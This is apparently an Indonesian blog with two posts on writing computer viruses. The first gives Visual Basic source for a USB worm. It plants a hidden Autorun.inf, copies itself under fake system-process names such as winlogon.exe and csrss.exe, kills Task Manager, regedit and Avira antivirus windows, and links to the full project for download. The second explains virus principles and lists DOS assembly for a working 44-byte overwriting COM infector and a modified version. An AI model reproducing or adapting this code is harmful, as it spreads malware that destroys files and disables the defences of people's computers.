‘membuat file Autorun.inf ke flashdisk yang berfungsi agar setiap flashdisk jika di klik dua kali/klik kanan trus klik open maka Virus (winlogon.exe) akan tereksekusi
On Error Resume Next
Open FlashDisk & “\Autorun.Inf” For Output As 1
Print #1, “[AutoRun]”
Print #1, “Icon=Winlogon.exe” ‘Agar FlashDisk Memiliki Icon Sama dengan Virus
Print #1, “Open=Winlogon.exe”
Print #1, “ShellExecute=Winlogon.exe”
Print #1, “Shell\Open\Command=Winlogon.exe”
Print #1, “Shell=Open”
Close #1
SetAttr FlashDisk & “\Autorun.Inf”, vbHidden + vbSystem + vbReadOnly
End Sub

Sub GandakefolderIstimewa()
On Error Resume Next
Set RegRun = CreateObject(“WScript.Shell”)
FolderStartUp = RegRun.specialfolders(“StartUp”)
FolderMyDocuments = RegRun.specialfolders(“MyDocuments”)
FolderTemplates = RegRun.specialfolders(“Templates”)
FolderNetHood = RegRun.specialfolders(“NetHood”)
FolderPrintHood = RegRun.specialfolders(“PrintHood”)
FolderFavorites = RegRun.specialfolders(“Favorites”)
FolderSendTo = RegRun.specialfolders(“SendTo”)
FolderPrograms = RegRun.specialfolders(“Programs”)
On Error Resume Next
‘membuat virus dengan nama winlogon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderStartUp & “\WinLogon.Exe”
SetAttr FolderStartUp & “\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama services.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderMyDocuments & “\services.Exe”
SetAttr FolderMyDocuments & “\services.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama smss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderTemplates & “\smss.Exe”
SetAttr FolderTemplates & “\smss.Exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama csrss.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrintHood & “\csrss.Exe”
SetAttr FolderPrintHood & “\csrss.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama Isass.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderNetHood & “\Isass.Exe”
SetAttr FolderNetHood & “\Isass.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama SalamKenal.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderFavorites & “\SalamKenal.Exe”
SetAttr FolderFavorites & “\SalamKenal.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama System.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderSendTo & “\System.Exe”
SetAttr FolderSendTo & “\System.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama ctfmon.exe
FileCopy App.Path & “\” & App.EXEName & “.exe”, FolderPrograms & “\ctfmon.Exe”
SetAttr FolderPrograms & “\ctfmon.exe”, vbHidden + vbSystem + vbReadOnly
End Sub

Private Sub Timer1_Timer() ‘Timer 1 diberi interval 5 detik
On Error Resume Next
FWnd = FindWindow(“OpusApp”, “Document1 – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(“OpusApp”, “New Microsoft Word Document.doc – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
End Sub

Private Sub Timer2_Timer()
On Error Resume Next
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – Book1″) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(“XLMAIN”, “Microsoft Excel – New Microsoft Excel Worksheet.xls”) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
End Sub

Private Sub Timer3_Timer()
On Error Resume Next
‘menutup aplikasi yang berbahaya bagi virus
FWnd = FindWindow(“#32770″, “RUN”) ‘jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “System Configuration Utility”) ‘msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “Windows Task Manager”) ‘task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “Avira AntiVir Personal – Free Antivirus”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “AntiVir Guard: Attention, Detection!”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“RegEdit_RegEdit”, vbNullString) ‘regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“TMainForm”, vbNullString) ‘aplikasi buatan Delphi (Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru tidak bisa dihentikan) <:d
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“TApplication”, vbNullString) ‘aplikasi buatan Delphi
SendMessage FWnd, WM_CLOSE, 0&, 0&
End Sub

Private Sub Timer4_Timer()
‘cari flashdisk
On Error Resume Next
For i = 0 To Drive1.ListCount – 1
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
FlashDisk = (Drive1.List(i))
Timer4.Enabled = False ‘agar lampu flashdisk tdk berkedip-kedip terlalu lama, sehingga tdk mencurigakan si empunya flashdisk
Exit For
End If
Next
GandaKeFlashDisk ‘
End Sub

Private Sub Timer5_Timer()
On Error Resume Next
InfeksiRegistry
‘Mungkin salah satu virus dihapus shg perlu selalu menggandakan diri
GandakefolderIstimewa
‘menyalakan timer 4
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
Timer4.Enabled = True
End If
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1
End Sub

Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
End Sub

Silahkan Download Project Di Download/Upload Gratis Join 4Shared Now!, Tetapi sebelumnya jika anda berkenan berikan rating pada artikel ini dengan mengklik tanda bintang di bawah ini, agar saya mengetahui artikel yang paling menarik untuk penulisan selanjutnya. Terimakasih.

Ditulis dalam Virus. Leave a Comment »

Pemrograman Virus Komputer

4. 1. Cara Kerja Virus Komputer

Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung dari DOS Command line . Untuk memperjelas mekanisme penyebaran di ilustrasikan pada gambar dibawah ini :

Gambar 4.1. Mekanisme Penularan

Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau program virus tersebut ke program aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada program aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.

Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah :

  1. Kemampuan mendapatkan informasi
  2. Kemampuan memeriksa program
  3. Kemampuan menggandakan diri / menularkan
  4. Kemampuan mengadakan manipulasi
  5. Kemampuan menyembunyikan diri sendiri

Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya

4. 1.1. Kemampuan mendapatkan Informasi

Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting, terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain :

1. Apakah Extensi File tersebut ( COM,EXE, BAT)
2. Apa Atribut file ( Hidden, Readonly, Archive)
3. Besar File Yang akan Di infeksi

Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.

Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden ataukan virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.

Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana

Besar_file_terinfeksi = file_asli + Virus_size

Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :

 

 

Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh
Mov cx, 3 ; Attribut File    ; cari host file

———

int 21h     ; Dos Intrupt
cmp ax,12h  ; Ada file lagi

je exit     ; kalau tidak ada exit

———

file_to_infect db “*.COM” ; File yang akan diinfeksi
ends start                ; akhir kode Virus

 

 

Listing 4.1. Search First File

Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX ( Find First Matching File), dan mendapat kan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.

4. 1. 2. Kemampuan Untuk Memeriksa Program

Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan pemakai komputer. Seperti digambarkan dalam flowchart berikut ini :

Gambar 4.2. Memeriksa Program

 

Berikut ini contoh listing dari kemampuan untuk memeriksa file

 

Mov ah, 3fh       ; Baca file
Mov cx, 3         ; baca 3 byte
Mov dx,3_byte     ; simpan pada buffer
Add dx,si         ; Nama file
Int 21h           ; Dos intrupt
Cmp a,3           ; Cek 3 byte tadi
Jnz cari_lagi     ; Jika sudah tertular exit
Jmp Infect        ; kalau belum , infect_file
3_byte equ $      ;data 3 byte pertama dari file asli
;yang belum tertular
infect_file :     ; bagian penginfeksian

 

———— ; rutin infeksi

 

int 20h ; Dos Exit function
nop ; No Operation

 

 

Listing 4.2 . Periksa File

Pada rutin diatas dapat dilihat bagai mana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows

Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.

4. 1. 3. Kemampuan untuk menggandakan diri / Replicating

kemampuan ini merupakan inti utama dari Virus Komputer , karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak ( Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan sebagaimana mestinnya.

Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.

File bersih                                 program Virus

Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.

Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di belakang file korban.

Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :

Dalam program dapat diambil contoh 44-Virus.Com , yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.

Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.

Berikut ini listing dari 44-Virus.Asm :


virus segment
org 100h ; file COM
assume cs:virus

len equ offset last-100h ;Panjang virus = Akhir program – awal program
start : mov ah,04eh      ; Cari file dengan kategori file COM
xor cx,cx                ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask          ; Nama file COM masukan ke register DX
int 21h                  ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len     ; cx diisi panjang badan virus
lea dx,start            ; Masukan header Virus “V1″ pada DX
Mov ah,40h              ; Tulis badan virus dalam file korban
Int 21h                 ; Dos Intrupt
Next : mov ah,3eh       ; Tutup file korban
int 21h
mov ah,4fh    ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit

com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : db 090h         ; Akhir badan virus “V2″
virus ends

end start


Listing 4.3. Replicating / Penggandaan

4. 1. 4. Kemampuan Mengadakan Manipulasi

Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :

  1. Menampilkan tulisan / kata-kata / gambar
  2. Membunyikan port speaker
  3. Time bomb / logic Bomb

4.1.4.1. Menampilkan Tulisan / gambar

Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer , karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.

 


virus segment
org 100h
assume cs:virus

len equ offset last-100h ; Panjang virus = Akhir program – awal program
start : jmp mulai

msg db ‘ Modification of 44 Virus ‘,13,10
db ‘ © 2000,iwing[indovirus] ’,13,10
db ‘ – For Educational Only -$’,13,10

mulai : mov ah,09        ; Dos service 09h = Cetak String
lea dx,msg               ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
go : mov ah,04eh         ; Cari file dengan kategori file COM
xor cx,cx                ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask          ; Nama file COM masukan ke register DX
int 21h                  ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start           ; Masukan header Virus “V1″ pada DX
mov ah,40h             ; Tulis badan virus dalam file korban
Int 21h                ; Dos Intrupt
Next : mov ah,3eh      ; Tutup file korban
int 21h
mov ah,4fh             ; Cari file korban lagi
int 21h
jnb open_file          ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit

com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : int 20h         ; Akhir badan virus “V2″

virus ends

end start

 


Listing. 4.4. Rutin Cetak String

Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte
Dengan tambahan rutin untuk menampilkan string :

Modification of 44 Virus
© 2000,iwing[indovirus]
-For Educational Only –

setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu

 

mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt

Ditulis dalam Virus. Leave a Comment »
Ikuti

Get every new post delivered to your Inbox.

%d bloggers like this: